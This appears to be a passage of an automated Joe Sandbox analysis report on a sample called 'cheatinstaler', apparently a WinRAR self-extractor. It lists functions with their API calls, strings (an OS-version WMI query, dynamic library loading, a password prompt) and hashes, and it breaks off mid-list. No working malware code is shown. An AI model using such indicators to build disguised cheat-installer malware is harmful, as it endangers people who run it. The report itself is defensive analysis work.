                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                                                  • String ID: DXGIDebug.dll$UNC$\\?\
                                                                                  • API String ID: 4097890229-4048004291
                                                                                  • Opcode ID: 84a8d5924325d9694cefe69853777e32b6ff0efedf48cba38b0c2889e3b1290b
                                                                                  • Instruction ID: 4c215375e9231c62590d1307da34a023afd5e256131ddd23da10aaac761fc41d
                                                                                  • Opcode Fuzzy Hash: 84a8d5924325d9694cefe69853777e32b6ff0efedf48cba38b0c2889e3b1290b
                                                                                  • Instruction Fuzzy Hash: 50129F22B09A4284EB10EF66D4E41FDA371EB81B98F944135EA5D07BE9DF3CD549C360
                                                                                  Function 00007FF75456A440 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 257COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskDialog
                                                                                  • String ID: GETPASSWORD1$Software\WinRAR SFX
                                                                                  • API String ID: 431506467-1315819833
                                                                                  • Opcode ID: cbdb2342dbc27246140afa92192789482b4dc38f3de2603255fba98438e470aa
                                                                                  • Instruction ID: 2e26940cf45fe397db2b0e080b6d2f6b465cf128c8156e5d186f7478d4256611
                                                                                  • Opcode Fuzzy Hash: cbdb2342dbc27246140afa92192789482b4dc38f3de2603255fba98438e470aa
                                                                                  • Instruction Fuzzy Hash: 6EB1E162F1978295FB00EF76D4E42BC7372AB45394F984231DA1C26AD9DE3CE545C320
                                                                                  Function 00007FF75457E650 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                  • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                  • API String ID: 3215553584-2617248754
                                                                                  • Opcode ID: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
                                                                                  • Instruction ID: 531f18b66e1b5be0693c4a455494af7a8ce8311cb008be08969ea0a3ae4a5a10
                                                                                  • Opcode Fuzzy Hash: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
                                                                                  • Instruction Fuzzy Hash: 4F41EE32A0AB4188FB05DF26E8A17A973A4FB18398F994136EE5C07B44DE3CE125C354
                                                                                  Function 00007FF75456F390 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ButtonCheckedObject$ClassDeleteLongName
                                                                                  • String ID: STATIC
                                                                                  • API String ID: 781704138-1882779555
                                                                                  • Opcode ID: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
                                                                                  • Instruction ID: 303ece6e4380c9bbd296ec62e4ef0ebc06c8bcc5852a24079af266afcd231fdb
                                                                                  • Opcode Fuzzy Hash: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
                                                                                  • Instruction Fuzzy Hash: C2317426B0968256FA60FF13A5B47B9A391BF89BD5F880430DD4D07B59DE3CE4068760
                                                                                  Function 00007FF754566E80 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 204memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$AllocGlobal
                                                                                  • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                  • API String ID: 2721297748-1533471033
                                                                                  • Opcode ID: d8862c3025e57af8a5778f9936a91020890481e3bad1d2e12bbb9941efaf755e
                                                                                  • Instruction ID: eaebc4cb5d7379ddb8b82e55f2647d2e03b9b93eaab1d8dd4e57f80ecbb94aea
                                                                                  • Opcode Fuzzy Hash: d8862c3025e57af8a5778f9936a91020890481e3bad1d2e12bbb9941efaf755e
                                                                                  • Instruction Fuzzy Hash: 1A819F62F18A4295FB00EFB6D4A01EDB371AF447D4F980136DE1D1769AEE38E50AC360
                                                                                  Function 00007FF75456AE90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: Item$Text
                                                                                  • String ID: LICENSEDLG
                                                                                  • API String ID: 1601838975-2177901306
                                                                                  • Opcode ID: 35fefc179f922e98870b8a3b257cf5e504c5ed53f195972dc606f5139ed8380b
                                                                                  • Instruction ID: 9481e9b4741ae662074d2e19940b786173db2a0fbac83e3e9e2e4a04dbf90803
                                                                                  • Opcode Fuzzy Hash: 35fefc179f922e98870b8a3b257cf5e504c5ed53f195972dc606f5139ed8380b
                                                                                  • Instruction Fuzzy Hash: BE418F22B0869292FB14AF13A8F4779A7A1AF85F81F9C4035D90E07B95CF3CE945C320
                                                                                  Function 00007FF75455B9B4 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 84libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$CurrentDirectoryProcessSystem
                                                                                  • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                                  • API String ID: 2915667086-2207617598
                                                                                  • Opcode ID: 6794cfd2df2083ddb130d433e4ca33b69faefb70ddab7dfcfa84983386d80e8a
                                                                                  • Instruction ID: 761a4ef69c758f449675042e8d8950b8644ca56ec398e5a72badf547f4908b66
                                                                                  • Opcode Fuzzy Hash: 6794cfd2df2083ddb130d433e4ca33b69faefb70ddab7dfcfa84983386d80e8a
                                                                                  • Instruction Fuzzy Hash: 86315765E0DB0682FA14AF27E8F81B5A3A1EF45B90F9C4135E80E437A4EE3CE5458320
                                                                                  Function 00007FF7545687D8 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 415COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                  • String ID: $
                                                                                  • API String ID: 3668304517-227171996
                                                                                  • Opcode ID: 3e5c1c837bf5b094cbf702a79e584555beddaf0efbc8773bf26ad6af60c03e6c
                                                                                  • Instruction ID: 8b06bf5c2a49198fdf31984a0d6e1f798e009f49ca3b64b6a70166ab9472d540
                                                                                  • Opcode Fuzzy Hash: 3e5c1c837bf5b094cbf702a79e584555beddaf0efbc8773bf26ad6af60c03e6c
                                                                                  • Instruction Fuzzy Hash: 43F1E362F16A8260EE10AF66D0E41BCA371AB44BA8F985631CB2D177D5DF7CE184C360
                                                                                  Function 00007FF7545757EC Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 317COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
                                                                                  • String ID: csm$csm$csm
                                                                                  • API String ID: 2940173790-393685449
                                                                                  • Opcode ID: 65edb01f61f21fff02eaccc9a46b43a233fa456fccf40e480b66f774ee54b1a7
                                                                                  • Instruction ID: 4dd78ee23b42f9ed7693df18093352920e4bb2e6f4bc7c767d16f0a15430aebc
                                                                                  • Opcode Fuzzy Hash: 65edb01f61f21fff02eaccc9a46b43a233fa456fccf40e480b66f774ee54b1a7
                                                                                  • Instruction Fuzzy Hash: 3AE1E4729187868AE710AF36D4E03ADBBA0FB45798F980135DA8D47A56CF38E285C750
                                                                                  Function 00007FF754554F38 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 158COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocClearStringVariant
                                                                                  • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                  • API String ID: 1959693985-3505469590
                                                                                  • Opcode ID: a8b35b7bcd37d82ee4aaa20c3b876beaab518b1de9e1ce59ea14af8b32f1fe8d
                                                                                  • Instruction ID: 224c29d2a2dffeca877f6bfedf4809e1c3813504718f25ed3766058c87496602
                                                                                  • Opcode Fuzzy Hash: a8b35b7bcd37d82ee4aaa20c3b876beaab518b1de9e1ce59ea14af8b32f1fe8d
                                                                                  • Instruction Fuzzy Hash: D0712F36A14B0595EB20EF26D8E06ADB7B4FB84B98F985132EA4D43B68DF3CD544C710
                                                                                  Function 00007FF7545772EC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF7545774F3,?,?,?,00007FF75457525E,?,?,?,00007FF754575219), ref: 00007FF754577371
                                                                                  • GetLastError.KERNEL32(?,?,00000000,00007FF7545774F3,?,?,?,00007FF75457525E,?,?,?,00007FF754575219), ref: 00007FF75457737F
                                                                                  • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF7545774F3,?,?,?,00007FF75457525E,?,?,?,00007FF754575219), ref: 00007FF7545773A9
                                                                                  • FreeLibrary.KERNEL32(?,?,00000000,00007FF7545774F3,?,?,?,00007FF75457525E,?,?,?,00007FF754575219), ref: 00007FF7545773EF
                                                                                  • GetProcAddress.KERNEL32(?,?,00000000,00007FF7545774F3,?,?,?,00007FF75457525E,?,?,?,00007FF754575219), ref: 00007FF7545773FB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                  • String ID: api-ms-
                                                                                  • API String ID: 2559590344-2084034818
                                                                                  • Opcode ID: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
                                                                                  • Instruction ID: ae13d389c809e7e9ab7ac64d3e4eb44025ac6b3e367bd208ddd33ca2b39ca814
                                                                                  • Opcode Fuzzy Hash: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
                                                                                  • Instruction Fuzzy Hash: BC31AD21B1A64281EE21BF27B8A0579A295FF08BE4FAD4635DD1D4B390EF3CF5408720
                                                                                  Function 00007FF754571604 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43libraryloaderCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(?,?,?,00007FF754571573,?,?,?,00007FF75457192A), ref: 00007FF75457162B
                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF754571573,?,?,?,00007FF75457192A), ref: 00007FF754571648
                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF754571573,?,?,?,00007FF75457192A), ref: 00007FF754571664
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$HandleModule
                                                                                  • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                  • API String ID: 667068680-1718035505
                                                                                  • Opcode ID: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
                                                                                  • Instruction ID: 538c2931e39e5da91b699ae0f9ffdf3945c098fbb9d4fa6f24cbf4f7eb5d8669
                                                                                  • Opcode Fuzzy Hash: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
                                                                                  • Instruction Fuzzy Hash: 36110C21E19B0291FE65AF03A9E4274A2A5BF087D4FDC5439C81F0AB54EE3CA955C630
                                                                                  Function 00007FF75455ED24 Relevance: 9.1, APIs: 6, Instructions: 120timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00007FF7545551A4: GetVersionExW.KERNEL32 ref: 00007FF7545551D5
                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF754545AB4), ref: 00007FF75455ED8C
                                                                                  • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF754545AB4), ref: 00007FF75455ED98
                                                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF754545AB4), ref: 00007FF75455EDA8
                                                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF754545AB4), ref: 00007FF75455EDB6
                                                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF754545AB4), ref: 00007FF75455EDC4
                                                                                  • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF754545AB4), ref: 00007FF75455EE05
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: Time$File$System$Local$SpecificVersion
                                                                                  • String ID:
                                                                                  • API String ID: 2092733347-0
                                                                                  • Opcode ID: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
                                                                                  • Instruction ID: 1a217dfba699840ac78b4c51a90c822a530354d7c4469e1bc80c175d48557e22
                                                                                  • Opcode Fuzzy Hash: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
                                                                                  • Instruction Fuzzy Hash: 8E518CB2B106518BEB14DFA9D4901AC77B1F748B88BA4403AEE0E57B58DF38E546C710
                                                                                  Function 00007FF75455F010 Relevance: 9.1, APIs: 6, Instructions: 80timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: Time$File$System$Local$SpecificVersion
                                                                                  • String ID:
                                                                                  • API String ID: 2092733347-0
                                                                                  • Opcode ID: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
                                                                                  • Instruction ID: 72cbc550a727429fcddc3def5241fe854453b810d6344542c2fab9c7bf874eda
                                                                                  • Opcode Fuzzy Hash: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
                                                                                  • Instruction Fuzzy Hash: 27313B66B10A518EFB14DFB5D8901BC7770FB08758B98502AEE0E97A58EF38D495C710
                                                                                  Function 00007FF754557918 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 233COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
